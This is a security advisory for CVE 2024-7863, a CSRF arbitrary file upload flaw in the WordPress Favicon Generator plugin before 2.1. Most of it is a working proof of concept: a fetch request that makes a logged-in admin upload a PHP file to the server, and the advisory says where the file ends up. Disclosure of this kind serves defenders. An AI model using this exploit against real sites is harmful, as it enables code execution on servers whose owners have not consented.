Favicon Generator < 2.1 – Arbitrary File Upload via CSRF | CVE 2024-7863

Description

The plugin does not validate files to be uploaded and does not have CSRF checks, which could allow attackers to make logged in admin upload arbitrary files such as PHP on the server

Proof of Concept

Make a logged in admin open a page containing the code below:

```
await fetch("https://example.com/wp-admin/admin.php?page=Favicon-Generator", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "de,en;q=0.7,en-US;q=0.3",
        "Content-Type": "multipart/form-data; boundary=---------------------------335926839722955035332775882815",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache"
    },
    "referrer": "https://example.com/wp-admin/admin.php?page=Favicon-Generator",
    "body": "-----------------------------335926839722955035332775882815\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\nbbbb\r\n-----------------------------335926839722955035332775882815\r\nContent-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n/wp-admin/admin.php?page=Favicon-Generator\r\n-----------------------------335926839722955035332775882815\r\nContent-Disposition: form-data; name=\"donated\"\r\n\r\nno\r\n-----------------------------335926839722955035332775882815\r\nContent-Disposition: form-data; name=\"favicon\"; filename=\"test.php\"\r\nContent-Type: text/plain\r\n\r\n<?php phpinfo();\n\n\n\r\n-----------------------------335926839722955035332775882815\r\nContent-Disposition: form-data; name=\"html-upload\"\r\n\r\nUpload\r\n-----------------------------335926839722955035332775882815--\r\n",
    "method": "POST",
    "mode": "cors"
});
```

The file will be uploaded at https://example.com/wp-content/plugins/favicon-generator/uploads/test.php